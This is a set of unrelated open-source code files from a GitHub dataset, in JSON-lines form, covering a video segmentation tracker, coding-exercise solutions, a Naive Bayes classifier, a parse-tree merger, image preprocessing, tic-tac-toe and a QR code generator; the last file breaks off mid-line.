seg_probs_all, dis_probs_all, merged_labels)\n raw_segs = odict()\n for i, obj_id in enumerate(object_ids):\n raw_segs[obj_id] = torch.cat((seg_probs_all[i + 1], dis_probs_all[i + 1]), dim=-3).cpu()\n\n return merged_labels, raw_segs\n\n def merge(self, frame, targets):\n \"\"\" Merges the predictions of individual targets. Note: Use this as a static method ... \"\"\"\n\n tg_channel = 0\n\n object_ids = list(frame.segmentation.keys())\n\n fg = None # All foreground objects - a 0/1 mask\n for target in frame.segmentation.values():\n tg = target[tg_channel].cpu()\n if not torch.is_tensor(tg):\n tg = torch.from_numpy(tg)\n if fg is None:\n fg = tg\n else:\n fg = torch.max(tg, fg)\n\n # Merge segmentation scores using the soft-aggregation approach from RGMP\n\n # Collect segmentation scores\n seg_scores = []\n for obj_id in object_ids:\n if obj_id not in frame.segmentation_raw:\n # This is the first frame for this target\n\n # Get ground-truth target and generate distractor\n tg = frame.segmentation[obj_id][tg_channel].cpu()\n dt = fg * (1 - tg)\n # Convert to logits, i.e raw segmentations\n tg = (tg - 0.5) * 200.0 # (100 to target, -100 to background)\n dt = (dt - 0.5) * 200.0\n\n s = torch.stack((tg, dt))\n else:\n # Not the first frame for this target.\n s = frame.segmentation_raw[obj_id]\n\n seg_scores.append(s.reshape(1, *s.shape[-3:]))\n seg_scores = torch.stack(seg_scores).float()\n\n have_distractors = seg_scores.shape[-3] == 2\n assert have_distractors\n\n merged_labels, raw_segs = self._merge_sigmoid(object_ids, seg_scores)\n\n # Get target bounding boxes\n\n merged_boxes = {}\n for obj_id, seg_prob in raw_segs.items():\n merged_boxes[obj_id] = torch.cat(targets[obj_id].spatial_tracker.get_target_bbox(seg_prob, tlhw=True)).tolist()\n\n frame.labels = merged_labels\n frame.segmentation_raw = raw_segs\n frame.target_bbox = merged_boxes\n\n return frame\n\n # def uncrop(self, s_crop, sample_pos, sample_scale, im_size, outside_value=-100.0):\n # \"\"\" Obtain segmentation scores for the full image using the scores for the search region crop. This is done by\n # assigning a low score (outside_value=-100) for image regions outside the search region \"\"\"\n #\n # # Resize the segmentation scores to match the image scale\n # s = F.interpolate(s_crop, scale_factor=sample_scale.item(), mode='bilinear', align_corners=True, recompute_scale_factor=True)\n # (sc, sh, sw), dev = s.shape[-3:], s.device\n # s = s.view(*s.shape[-3:])\n #\n # # Regions outside search area get very low score\n # s_im = torch.ones((sc, *im_size), dtype=s.dtype, device=dev) * outside_value\n #\n # # Find the co-ordinates of the search region in the image scale\n # r1 = int(sample_pos[0].item() - 0.5*s.shape[-2])\n # c1 = int(sample_pos[1].item() - 0.5*s.shape[-1])\n #\n # r2 = r1 + s.shape[-2]\n # c2 = c1 + s.shape[-1]\n #\n # r1_pad = max(0, -r1)\n # c1_pad = max(0, -c1)\n #\n # r2_pad = max(r2 - im_size[-2], 0)\n # c2_pad = max(c2 - im_size[-1], 0)\n #\n # # Copy the scores for the search region\n # s_im[:, r1 + r1_pad:r2 - r2_pad, c1 + c1_pad:c2 - c2_pad] = s[:, r1_pad:sh - r2_pad, c1_pad:sw - c2_pad]\n #\n # return s_im\n\n def segment_target(self, feat_tm, feat_bbone, im_size, gt_mask=None, get_mask_enc=False):\n with torch.no_grad():\n segmentation_scores, mask_encoding_pred = self.net.segment_target(\n self.target_filter, feat_tm, feat_bbone, im_size, gt_mask=gt_mask)\n\n if get_mask_enc:\n return segmentation_scores, mask_encoding_pred\n return segmentation_scores\n\n def extract_patches(self, im: torch.Tensor, pos: torch.Tensor, scale, sz: torch.Tensor, gt_mask=None):\n im_patches, patch_coords = sample_patch_multiscale(im, pos, scale.unsqueeze(0), sz,\n mode=self.params.get('border_mode', 'replicate'),\n max_scale_change=self.params.get('patch_max_scale_change', None))\n if gt_mask is not None:\n gt_mask, _ = sample_patch_multiscale(gt_mask, pos, scale.unsqueeze(0), sz,\n mode=self.params.get('border_mode', 'replicate'),\n max_scale_change=self.params.get('patch_max_scale_change', None))\n return patch_coords[0], im_patches, gt_mask\n\n return patch_coords[0], im_patches\n\n def extract_backbone_features(self, im_patches):\n with torch.no_grad():\n return self.net.extract_backbone(im_patches)\n\n def extract_target_model_features(self, backbone_feat):\n \"\"\" Extract features input to the target model\"\"\"\n with torch.no_grad():\n return self.net.extract_target_model_features(backbone_feat)\n\n def generate_init_samples(self, im: torch.Tensor, init_mask):\n \"\"\" Generate initial training sample.\"\"\"\n\n # Locate the target\n pos, scale, size, transforms = self.spatial_tracker.generate_init_samples_params(im, init_mask)\n\n # Extract image patches\n im_patches = sample_patch_transformed(im, pos, scale, size, transforms)\n init_masks = sample_patch_transformed(init_mask, pos, scale, size, transforms, is_mask=True)\n init_masks = init_masks.to(self.device)\n self.transforms = transforms\n\n # Extract backbone features\n feat_bbone = self.extract_backbone_features(im_patches)\n\n return im_patches, feat_bbone, init_masks\n\n @staticmethod\n def _visualize_mask_enc(mask_enc):\n\n from davos.lib.debug import DebugVis\n vis = DebugVis()\n\n channels = list(range(0, 32))\n remove = [2, 4, 12, 14, 22, 23, 25, 26, 27, 28, 30, 31]\n for v in remove:\n channels.remove(v)\n c = mask_enc.squeeze()[channels]\n vis.show_enclb(c)\n\n\n\n def init_target_model(self, feat_bbone, masks):\n # Get target model features\n feat_tm = self.extract_target_model_features(feat_bbone)\n\n # Set sizes\n self.feature_sz = torch.Tensor(list(feat_tm.shape[-2:]))\n ksz = self.net.target_model.filter_size\n self.kernel_size = torch.Tensor(_pair(ksz))\n self.output_sz = self.feature_sz + (self.kernel_size + 1) % 2\n\n self.spatial_tracker.set_tm_params(self.kernel_size, self.feature_sz)\n\n # Set number of iterations\n num_iter = self.params.get('net_opt_iter', None)\n\n visualize = hasattr(self, 'vis')\n\n # Encode the masks and train the target model\n with torch.no_grad():\n mask_enc, mask_ws = self.net.label_encoder(masks, feat_tm.unsqueeze(1))\n self.target_filter, _, losses = self.net.target_model.get_filter(\n feat_tm.unsqueeze(1), mask_enc, mask_ws, num_iter=num_iter, compute_losses=visualize)\n\n if visualize:\n test_enc, test_pred = self.apply_target_model(\n feat_tm.unsqueeze(1), self.target_filter,\n decode=True, feat_bbone=feat_bbone, im_size=masks.shape[-2:]\n )\n self.vis.current_value_range = (-100, 100)\n self.vis.show_rawseg(test_pred[0, 0], title=\"predicted target\")\n self.vis.show_rawseg(test_pred[0, 1], title=\"predicted distractors\")\n self.vis.show_enclb(mask_enc, title=\"encoded training mask\")\n self.vis.show_enclb(test_enc, title=\"predicted encoded mask\")\n # self.vis.lineplot(torch.stack(losses), title=\"losses\")\n\n # Init memory\n if self.params.get('update_target_model', True):\n self.memory.initialize(TensorList([feat_tm]), labels=masks.view(-1, *masks.shape[-3:]))\n\n def apply_target_model(self, feat_tm, tm_filter, feat_bbone=None, im_size=None, decode=False):\n assert tm_filter.dim() == 5 # seq, filters, ch, h, w\n feat_tm = feat_tm.view(1, 1, *feat_tm.shape[-3:])\n mask_pred_enc = self.net.target_model.apply_target_model(tm_filter, feat_tm)\n if decode:\n mask_pred, decoder_feat = self.net.decoder(mask_pred_enc, feat_bbone, im_size)\n return mask_pred_enc, mask_pred\n return mask_pred_enc\n\n def update_target_model(self, train_x, mask, learning_rate=None):\n\n # Update the tracker memory\n lr = self.params.learning_rate if learning_rate is None else learning_rate\n if self.frame_num % self.params.get('train_sample_interval', 1) == 0:\n self.memory.update(TensorList([train_x]), mask, lr)\n\n # Decide the number of iterations to run\n num_iter = 0\n if (self.frame_num - 1) % self.params.train_skipping == 0:\n num_iter = self.params.get('net_opt_update_iter', None)\n\n if num_iter > 0:\n with torch.no_grad():\n # Read memory, encode masks\n samples, masks, sample_weights = self.memory.read()\n mask_enc, mask_sw = self.net.label_encoder(masks.unsqueeze(1), samples.unsqueeze(1))\n\n if mask_sw is not None:\n # mask_sw provides spatial weights, while sample_weights contains temporal weights.\n sample_weights = mask_sw * sample_weights.view(-1, 1, 1, 1, 1)\n\n # Optimize the target model filter\n target_filter, _, losses = self.net.target_model.filter_optimizer(\n TensorList([self.target_filter]), num_iter=num_iter,\n feat=samples.unsqueeze(1), label=mask_enc, sample_weight=sample_weights)\n\n self.target_filter = target_filter[0]\n\n","repo_name":"andr345/davos","sub_path":"davos/eval/trackers/dlwl.py","file_name":"dlwl.py","file_ext":"py","file_size_in_byte":20047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"104862196","text":"# ler dois valores, x e y; \n# usar funcao map e split; \n\n\n\nx, y = list(map(int, input().split()))\ncontador = 1\nfor _ in range(1, int(y/x)+1):\n msg = \"\"\n for _ in range(x):\n msg += str(contador)+\" \"\n contador +=1\n print(msg[:-1])","repo_name":"renatadecassiapires/beecrowd","sub_path":"exercicios_nivel_1_iniciante/exercicio1145/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":251,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"71459828871","text":"import pandas as pd\r\n\r\n# Feature columns we use\r\nx_rows=['MDVP:Fo(Hz)','MDVP:Fhi(Hz)','MDVP:Flo(Hz)',\r\n 'MDVP:Jitter(%)','MDVP:Jitter(Abs)','MDVP:RAP','MDVP:PPQ','Jitter:DDP']\r\n# x_rows=['MDVP:Fo(Hz)']\r\ny_rows=['status']\r\n\r\n# Train\r\n\r\n# Read train data\r\ntrain_data = pd.read_csv('parkinsons/Data_Parkinsons_TRAIN.csv')\r\ntrain_x = train_data[x_rows]\r\ntrain_y = train_data[y_rows]\r\nprint(\"train_x:\\n\", train_x)\r\nprint(\"train_y:\\n\", train_y)\r\n\r\n# Load sklearn Gaussian Naive Bayes and fit\r\nfrom sklearn.naive_bayes import GaussianNB \r\n\r\ngnb = GaussianNB() \r\ngnb.fit(train_x, train_y) \r\n\r\n# Prediction on train data\r\npredict_train = gnb.predict(train_x)\r\nprint('Prediction on train data:', predict_train) \r\n\r\n# Accuray score on train data\r\nfrom sklearn.metrics import accuracy_score\r\naccuracy_train = accuracy_score(train_y, predict_train)\r\nprint('Accuracy score on train data:', accuracy_train)\r\n\r\n# Test\r\n\r\n# Read test data\r\ntest_data = pd.read_csv('parkinsons/Data_Parkinsons_TEST.csv')\r\ntest_x = test_data[x_rows]\r\ntest_y = test_data[y_rows]\r\n\r\n# Prediction on test data\r\npredict_test = gnb.predict(test_x)\r\nprint('Prediction on test data:', predict_test) \r\n\r\n# Accuracy Score on test data\r\naccuracy_test = accuracy_score(test_y, predict_test)\r\nprint('Accuracy score on test data:', accuracy_train)\r\n\r\n# Prediction on unknown data\r\n# predict_unknown = gnb.predict([[150,160,70,0,0,0,0,0]])\r\npredict_unknown = gnb.predict([[240,250,230,0,0,0,0,0]])\r\nprint('Prediction on unknown data:', predict_unknown) \r\n","repo_name":"gammay/Machine-learning-made-easy-Naive-Bayes","sub_path":"naive_bayes_parkinsons.py","file_name":"naive_bayes_parkinsons.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"19207246212","text":"\n\n\"\"\"\n445. Add Two Numbers II——M\n\nhttps://leetcode.com/problems/add-two-numbers-ii/\n#################################\n考点或思路:\n[solution: ]\nSimilar problems:\n2. Add Two Numbers\n\n\"\"\"\nfrom typing import List\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\nclass Solution:\n def addTwoNumbers(self, l1: Optional[ListNode], l2: Optional[ListNode]) -> Optional[ListNode]:\n \"\"\"\n time: 0721/2022 10:35--11:00\n [Approach] Since the last index of the linkedlist would be the ones place of a number, we can go through \n it twce to solve the problem.\n First, we go throught each linkedlist, for each node in it, we add a attribute for it, we add a prePointer, which pointing to the pre node of it. meanwhile, we can get the last node of the linkedlist, which is also the once place of the number.\n Then, we start from the last node of each linkedlist, we add them and we track the carry of it.\n we can use the prePointer to get the next place node.and we continue do so till the hightes place.\n time_O(N+M) we go through each node twce. N= len(l1) M = len(l2)\n space_O(N+M) we need a new pointer for each node.\n \"\"\"\n \n p1 = l1\n p1.pre = None\n \n while p1.next:\n p1.next.pre = p1\n p1 = p1.next\n \n p2 = l2\n p2.pre = None\n while p2.next:\n p2.next.pre = p2\n p2 = p2.next\n \n dummy = ListNode(\"d\")\n carry = 0\n while p1 and p2:\n curVal = (p1.val + p2.val + carry) % 10\n carry = (p1.val + p2.val + carry) // 10\n node = ListNode(curVal,dummy.next)\n dummy.next = node\n p1 = p1.pre\n p2 = p2.pre\n \n while p1:\n curVal = (p1.val + carry) % 10\n carry = (p1.val + carry) // 10\n node = ListNode(curVal,dummy.next)\n dummy.next = node\n p1 = p1.pre\n \n while p2:\n curVal = (p2.val + carry) % 10\n carry = (p2.val + carry) // 10\n node = ListNode(curVal,dummy.next)\n dummy.next = node\n p2 = p2.pre\n if carry:\n node = ListNode(carry,dummy.next)\n dummy.next = node\n \n return dummy.next\n \n \n\n ","repo_name":"jellyfiona/LeetCode","sub_path":"LinkedList/445. Add Two Numbers II_M.py","file_name":"445. Add Two Numbers II_M.py","file_ext":"py","file_size_in_byte":2457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37262682338","text":"from collections import defaultdict\nfrom typing import List\n\n\nclass Solution:\n \"\"\"\n n - len(cp_domains)\n m - len(max(cp_domains)) - max string len\n\n Time: O(n * m)\n Space: O(n) - each domain will contain 2-3 dots\n \"\"\"\n\n def subdomainVisits(self, cp_domains: List[str]) -> List[str]:\n domains = defaultdict(int)\n for cp_domain in cp_domains:\n visits, domain = cp_domain.split()\n visits = int(visits)\n domains[domain] += visits\n\n for i, char in enumerate(domain):\n if char == \".\":\n domains[domain[i + 1:]] += visits\n\n return [f\"{visits} {domain_name}\" for domain_name, visits in domains.items()]\n","repo_name":"Vasilic-Maxim/LeetCode-Problems","sub_path":"problems/811. Subdomain Visit Count/1 - Use Hash Map.py","file_name":"1 - Use Hash Map.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17481901739","text":"import argparse\nimport gzip\nimport multiprocessing\nimport collections\nimport os\nimport random\nimport re\nimport nltk\nfrom tqdm import tqdm\n\n'''\npython utils/MAP_constituent.py --dirs ./wsj20dev_D2K15/ ./wsj20dev_D2K15_1/ \n./wsj20dev_D2K15_2 ./wsj20dev_D2K15_3 \n./wsj20dev_D2K15_4 ./wsj20dev_D2K15_5 \n./wsj20dev_D2K15_6 ./wsj20dev_D2K15_7 \n./wsj20dev_D2K15_9 --process 15 --output-fn test.txt.linetrees.gz --max-iter 650 --min-iter 550\n'''\n\ndef read_linetrees_file(fn):\n with gzip.open(fn, 'rt') as fh:\n trees = fh.readlines()\n # for line in fh:\n # tree = nltk.Tree.fromstring(line)\n # trees.append(tree)\n return trees\n\ndef add_index_to_leaves(tree):\n for leaf_index, leaf_position in enumerate(tree.treepositions(order='leaves')):\n tree[leaf_position] = tree[leaf_position] + '||' + str(leaf_index)\n\ndef argmax_bottom_up(dic, constituent_units):\n max_keys = []\n max_val = 0\n max_list_index = []\n bigram_tuples = [ (const, constituent_units[index+1]) for index, const in enumerate(\n constituent_units[:-1])]\n bigrams = [' '.join([const, constituent_units[index+1]]) for index, const in enumerate(\n constituent_units[:-1])]\n for index, key in enumerate(bigrams):\n if dic[key] > max_val:\n max_val = dic[key]\n max_keys = [key]\n max_list_index = [index]\n elif dic[key] == max_val:\n max_keys.append(key)\n max_list_index.append(index)\n if len(max_list_index) == 1:\n max_index = max_list_index[0]\n else:\n max_index = random.choice(max_list_index)\n return bigram_tuples[max_index], max_val\n\ndef argmax_top_down_nary(tree_const_list, constituent_units):\n if len(constituent_units) == 1:\n return [tuple(constituent_units), ], ['(' + re.sub('\\|\\|\\d+', '', constituent_units[0]) +\n ') :1', ]\n solution = []\n prob_strings = []\n max_keys = []\n max_val = 0\n max_list_index = []\n bigram_tuples = []\n for i in range(1, len(constituent_units)):\n bigram_tuples.append((constituent_units[:i], constituent_units[i:]))\n bigrams = [(' '.join(left), ' '.join(right)) for left, right in bigram_tuples]\n counts = {x: 0 for x in bigrams}\n for tree_index, tree_const in enumerate(tree_const_list):\n for const in bigrams:\n left = const[0]\n right = const[1]\n if left in tree_const and right in tree_const:\n counts[const] += 1\n for bigram in counts:\n if counts[bigram] > max_val:\n max_val = counts[bigram]\n max_keys = [bigram]\n max_list_index = [bigrams.index(bigram)]\n elif counts[bigram] == max_val:\n max_keys.append(bigram)\n max_list_index.append(bigrams.index(bigram))\n if len(max_keys) == 1:\n max_index = max_list_index[0]\n else:\n max_index = random.choice(max_list_index)\n total_counts = sum(counts.values())\n vals = [counts[bigram] for bigram in bigrams]\n sorted_vals = sorted(vals, reverse=True)\n # vals.sort(reverse=True)\n # assert vals[0] == max_val\n probs = [x / total_counts for x in vals]\n prob_string = '(' + ') , ('.join([re.sub('\\|\\|\\d+', '', x) for x in bigrams[max_index]]) + ') ' \\\n ':' + ' '.join(['{:.4f}'.format(x) for x in probs])\n sorted_probs = [ x / total_counts for x in sorted_vals]\n if (len(constituent_units) == 4 or len(constituent_units) == 3) and sorted_probs[0] - \\\n sorted_probs[1] <= 0.3 and flattening:\n solution.append(tuple([x,] for x in constituent_units))\n prob_strings.append(prob_string)\n # return solution, prob_strings\n else:\n solution.append(bigram_tuples[max_index])\n prob_strings.append(prob_string)\n for const in solution[-1]:\n part_solution, prob_string = argmax_top_down_nary(tree_const_list, const)\n solution.extend(part_solution)\n prob_strings.extend(prob_string)\n return solution, prob_strings\n\ndef argmax_top_down(tree_const_list, constituent_units):\n if len(constituent_units) == 1:\n return [tuple(constituent_units),],[ '(' + re.sub('\\|\\|\\d+', '', constituent_units[0]) +\n ') :1',]\n solution = []\n prob_strings = []\n max_keys = []\n max_val = 0\n max_list_index = []\n bigram_tuples = [ ]\n for i in range(1, len(constituent_units)):\n bigram_tuples.append((constituent_units[:i], constituent_units[i:]))\n bigrams = [(' '.join(left), ' '.join(right)) for left, right in bigram_tuples]\n counts = {x : 0 for x in bigrams}\n for tree_index, tree_const in enumerate(tree_const_list):\n for const in bigrams:\n left = const[0]\n right = const[1]\n if left in tree_const and right in tree_const:\n counts[const] += 1\n for bigram in counts:\n if counts[bigram] > max_val:\n max_val = counts[bigram]\n max_keys = [bigram]\n max_list_index = [bigrams.index(bigram)]\n elif counts[bigram] == max_val:\n max_keys.append(bigram)\n max_list_index.append(bigrams.index(bigram))\n if len(max_keys) == 1:\n max_index = max_list_index[0]\n else:\n max_index = random.choice(max_list_index)\n total_counts = sum(counts.values())\n vals = [ counts[bigram] for bigram in bigrams ]\n # vals.sort(reverse=True)\n # assert vals[0] == max_val\n probs = [x / total_counts for x in vals]\n prob_string = '(' + ') , ('.join([re.sub('\\|\\|\\d+', '', x) for x in bigrams[max_index]]) + ') ' \\\n ':' + ' '.join(['{:.4f}'.format(x) for x in probs])\n solution.append(bigram_tuples[max_index])\n prob_strings.append(prob_string)\n for const in bigram_tuples[max_index]:\n part_solution, prob_string = argmax_top_down(tree_const_list, const)\n solution.extend(part_solution)\n prob_strings.extend(prob_string)\n return solution, prob_strings\n\ndef process_single_tree_bottom_up(tree_list):\n tree_list = [nltk.Tree.fromstring(t) for t in tree_list]\n span_counter = collections.Counter()\n for tree in tree_list:\n spans = []\n add_index_to_leaves(tree)\n for subtree in tree.subtrees():\n spans.append(' '.join(tuple(subtree.leaves())))\n span_counter.update(spans)\n sent = tree_list[0].leaves()\n solution = []\n while len(sent) > 1:\n (max_left, max_right), max_count = argmax_bottom_up(span_counter, sent)\n solution.append((max_left, max_right))\n left_index = sent.index(max_left)\n right_index = sent.index(max_right)\n sent[left_index] = ' '.join((max_left, max_right))\n del sent[right_index]\n solution += [(x,) for x in tree_list[0].leaves()]\n # solution = clean_solution(solution)\n sent = tree_list[0].leaves()\n return solution_to_tree(sent, solution)\n\ndef process_single_tree_top_down(tree_list):\n tree_list = [nltk.Tree.fromstring(t) for t in tree_list]\n all_tree_spans = []\n for tree in tree_list:\n this_spans = []\n add_index_to_leaves(tree)\n for subtree in tree.subtrees():\n this_spans.append(' '.join(tuple(subtree.leaves())))\n all_tree_spans.append(this_spans)\n sent = tree_list[0].leaves()\n\n # solution, prob_strings = argmax_top_down(all_tree_spans, sent)\n solution, prob_strings = argmax_top_down_nary(all_tree_spans, sent)\n # print(solution)\n for index, const in enumerate(solution):\n if len(const) > 1:\n children = []\n for child in const:\n child = ' '.join(child)\n children.append(child)\n solution[index] = tuple(children)\n\n sent = tree_list[0].leaves()\n return solution_to_tree(sent, solution), prob_strings\n\ndef test():\n t1 = \"(X (X (X (X a) (X b)) (X c)) (X d))\"\n t2 = \"(X (X (X a) (X b)) (X (X c) (X d)))\"\n t3 = \"(X (X a) (X (X b) (X (X c) (X d))))\"\n t4 = \"(X (X a) (X (X b) (X (X c) (X d))))\"\n\n ts = [t1, t2, t3, t4]\n # sent = nltk.Tree.fromstring(t1)\n # add_index_to_leaves(sent)\n # sent = sent.leaves()\n # print(sent)\n solution = process_single_tree_top_down(ts)\n print(solution)\n # print(solution_to_tree(sent, solution))\n solution = process_single_tree_bottom_up(ts)\n print(solution)\n # print(solution_to_tree(sent, solution))\n\ndef solution_to_tree(string, solution):\n if isinstance(string, str):\n string = string.split(' ')\n str_len = len(string)\n for consts in solution:\n if len(consts) > 1:\n const_span_len = sum([len(x.split(' ')) for x in consts])\n first_word = consts[0].split(' ')[0]\n else:\n const_span_len = 1\n first_word = consts[0]\n if const_span_len == str_len and string[0] == first_word:\n if len(consts) > 1:\n children = []\n for child in consts:\n child = solution_to_tree(child, solution)\n children.append(child)\n else:\n return nltk.Tree('X', children=[re.sub('\\|\\|\\d+', '', first_word)])\n this_tree = nltk.Tree('X', children=children)\n return this_tree\n\ndef wrap_file_func(i, arg):\n return i, read_linetrees_file(arg)\n\ndef wrap_bottom_up_func(i, arg):\n return i, process_single_tree_bottom_up(arg)\n\ndef wrap_top_down_func(i, arg):\n return i, process_single_tree_top_down(arg)\n\ndef update(i_ans):\n i = i_ans[0]\n ans = i_ans[1]\n best_trees[i] = ans\n # print(ans[0])\n pbar.update()\n\ndef file_update(i_ans):\n i = i_ans[0]\n ans = i_ans[1]\n trees[i] = ans\n pbar.update()\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--dirs', '-d', nargs='+', help='the directories that contain the linetree '\n 'samples')\n parser.add_argument('--mode', '-m', choices=['tree', 'const'], help='the MAP mode: on trees or on '\n 'const[ituents]')\n parser.add_argument('--processes', '-p', type=int, help='number of parallel processes')\n parser.add_argument('--order', '-o', default='top-down', choices=['bottom-up', 'top-down'], help='which order is '\n 'the optimal '\n 'tree generated')\n parser.add_argument('--test', '-t', action='store_true', default=False)\n parser.add_argument('--output-fn', '-of', type=str, help='name of the output file')\n parser.add_argument('--max-iter', type=int, default=10000, help='the maximum iteration '\n 'linetrees ' \\\n 'file used')\n parser.add_argument('--min-iter', type=int, default=-1, help='the minimum iteration linetrees '\n 'file ' \\\n 'used')\n parser.add_argument('--flattening', default=False, action='store_true', help='turn on '\n 'posterior '\n 'flattening')\n args = parser.parse_args()\n if args.test:\n test()\n exit(0)\n flattening = args.flattening\n\n dirs = args.dirs\n\n fns = []\n\n best_trees = []\n print('Reading in the directory info.')\n for directory in dirs:\n for f in os.listdir(directory):\n if re.match(\"iter_[\\d]+\\.linetrees\\.gz\", f):\n iter_num = re.search('(?<=er_)\\d+', f).group(0)\n if int(iter_num) < args.max_iter and int(iter_num) > args.min_iter:\n fns.append(os.path.join(directory,f))\n\n print('Processing {} individual files.'.format(len(fns)))\n with multiprocessing.Pool(args.processes) as pool:\n\n pbar = tqdm(total=len(fns))\n trees = [None] * len(fns)\n for i in range(len(fns)):\n pool.apply_async(wrap_file_func, args=(i, fns[i]),\n callback=file_update)\n pool.close()\n pool.join()\n pbar.close()\n\n with multiprocessing.Pool(args.processes) as pool:\n print('Zipping the trees together.')\n trees_for_single_sent_list = list(zip(*trees))\n print(len(trees_for_single_sent_list), 'number of trees to be processed.')\n\n print(\"Processing individual trees.\")\n pbar = tqdm(total=len(trees_for_single_sent_list))\n best_trees = [None] * len(trees_for_single_sent_list)\n for i in range(len(trees_for_single_sent_list)):\n if args.order == 'bottom-up':\n pool.apply_async(wrap_bottom_up_func, args=(i, trees_for_single_sent_list[i]),\n callback=update)\n elif args.order == 'top-down':\n pool.apply_async(wrap_top_down_func, args=(i, trees_for_single_sent_list[i]),\n callback=update)\n pool.close()\n pool.join()\n pbar.close()\n\n print(\"Writing out results.\")\n with gzip.open(args.output_fn, 'wt') as ofh:\n if args.order == 'top-down':\n probfh = gzip.open(args.output_fn+'.probs', 'wt')\n for tree in best_trees:\n # print(tree)\n if args.order == 'top-down':\n some_tree, probs = tree\n string = some_tree.pformat(margin=100000)\n print('SENT:', string, file=probfh)\n for item in probs:\n # print(item)\n assert isinstance(item, str)\n\n print(item, file=probfh)\n else:\n some_tree = tree\n\n string = some_tree.pformat(margin=100000)\n print(string, file=ofh)\n probfh.close()","repo_name":"lifengjin/dimi_emnlp18","sub_path":"utils/MAP_constituent.py","file_name":"MAP_constituent.py","file_ext":"py","file_size_in_byte":14150,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"27"} +{"seq_id":"41099442604","text":"import cv2\nimport numpy as np\n\nclass ImagePreprocessor:\n def __init__(self):\n return\n\n def getPreprocessingResults(self, image):\n return self.performPreprocessing(image)\n\n def resizingImage(self, image):\n # Standard scale is 700x700 pixels\n standardScale = 500\n height, width, layers = image.shape\n if (height > standardScale or width > standardScale):\n maximumSize = max(height, width)\n scalePercent = standardScale / maximumSize\n width = int(width * scalePercent)\n height = int(height * scalePercent)\n dim = (width, height)\n return cv2.resize(image, dim, interpolation=cv2.INTER_AREA)\n else:\n return image\n\n def equalizeContrast(self, image):\n intensitiesValues = np.arange(256, dtype=np.float)\n probabilitiesValues = np.arange(256, dtype=np.float)\n for i in range(256):\n intensitiesValues[i] = 0\n\n rows, columns = image.shape\n for i in range(rows):\n for j in range(columns):\n intensitiesValues[image[i, j]] += 1\n\n for k in range(256):\n probabilitiesValues[k] = intensitiesValues[k] / (rows * columns)\n\n # Apply histogram equalization transformation function\n newIntensityValues = np.arange(256, dtype=np.float)\n for i in range(256):\n newIntensityValues[i] = 0\n\n transformedImg = image.copy()\n for i in range(256):\n sum = 0\n for j in range(i):\n sum += probabilitiesValues[j]\n newIntensityValues[i] = round(sum * 255)\n for i in range(rows):\n for j in range(columns):\n transformedImg[i, j] = newIntensityValues[image[i, j]]\n return transformedImg\n\n\n def normalizeImage(self, image):\n # Because it is an 8-bit image\n image = cv2.cvtColor(image, cv2.COLOR_RGB2YCrCb)\n channels = cv2.split(image)\n channels[0] = self.equalizeContrast(channels[0])\n cv2.merge(channels, image)\n image = cv2.cvtColor(image, cv2.COLOR_YCrCb2RGB)\n return image\n\n def sharpeningImage(self, image):\n laplacianKernel = np.array(\n [[0, -1, 0],\n [-1, 5, -1],\n [0, -1, 0]]\n )\n return cv2.filter2D(image, -1, laplacianKernel)\n\n def performPreprocessing(self, image):\n #image = self.resizingImage(image)\n image = self.normalizeImage(image)\n return image\n\n def backingupImage(self, image):\n cv2.imwrite(\"../../assets/images/PreprocessingResults/PreprocessingResults.png\", image)","repo_name":"hamzafer/Visual-Assistant","sub_path":"backend/Classes/ImagePreprocessor.py","file_name":"ImagePreprocessor.py","file_ext":"py","file_size_in_byte":2651,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"43391529815","text":"def func_task1(cage):\r\n for i in range(3):\r\n if cage[i][0] == cage[i][1] == cage[i][2] and cage[i][0] != ' ':\r\n return cage[i][0]\r\n for j in range(3):\r\n if cage[0][j] == cage[1][j] == cage[2][j] and cage[0][j] != ' ':\r\n return cage[0][j]\r\n if cage[0][0] == cage[1][1] == cage[2][2] and cage[0][0] != ' ':\r\n return cage[0][0]\r\n if cage[0][2] == cage[1][1] == cage[2][0] and cage[0][2] != ' ':\r\n return cage[0][2]\r\n return \"Ничья\"\r\n\r\ncage = [\r\n ['X', 'X', 'X'],\r\n ['O', 'X', 'O'],\r\n ['O', 'X', 'O']\r\n]\r\n\r\nprint(func_task1(cage), \"победили\")\r\n","repo_name":"glamiturianmai/alg-5","sub_path":"1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23142675786","text":"from tkinter import *\nimport pyqrcode\nimport png\nfrom tkinter import filedialog\nfrom PIL import Image, ImageTk\n\nroot=Tk()\nroot.title(\"QR Code Generator\")\nroot.geometry('500x550')\ndef create_code():\n #file path\n input_path = filedialog.asksaveasfilename(title='Saved Image', filetyp=((\"PNG File\", \".png\"),(\"ALL Files\", \"*.*\"))) \n if input_path:\n if input_path.endswith(\".png\"):\n #qr generator\n get_code = pyqrcode.create(my_entry.get())\n\n #file save\n get_code.png(input_path, scale=5)\n\n\n else:\n #add png\n input_path = f'{input_path}.png'\n #create qr code\n get_code = pyqrcode.create(my_entry.get())\n #save png\n get_code.png(input_path, scale=5)\n\n #put qr in new window\n global get_image\n get_image = ImageTk.PhotoImage(Image.open(input_path))\n #add image to label\n my_label.config(image = get_image)\n #clear entry box\n my_entry.delete(0,END)\n #succesfully generated\n my_entry.insert(0,'Succesfully Generated!')\n\ndef clear_all():\n my_entry.delete(0,END)\n my_label.config(image='')\n\n#GUI\nmy_entry = Entry(root, font=(\"Helvetica\", 20))\nmy_entry.pack(pady=20)\n\nmy_button = Button(root,text= \"Generate\", 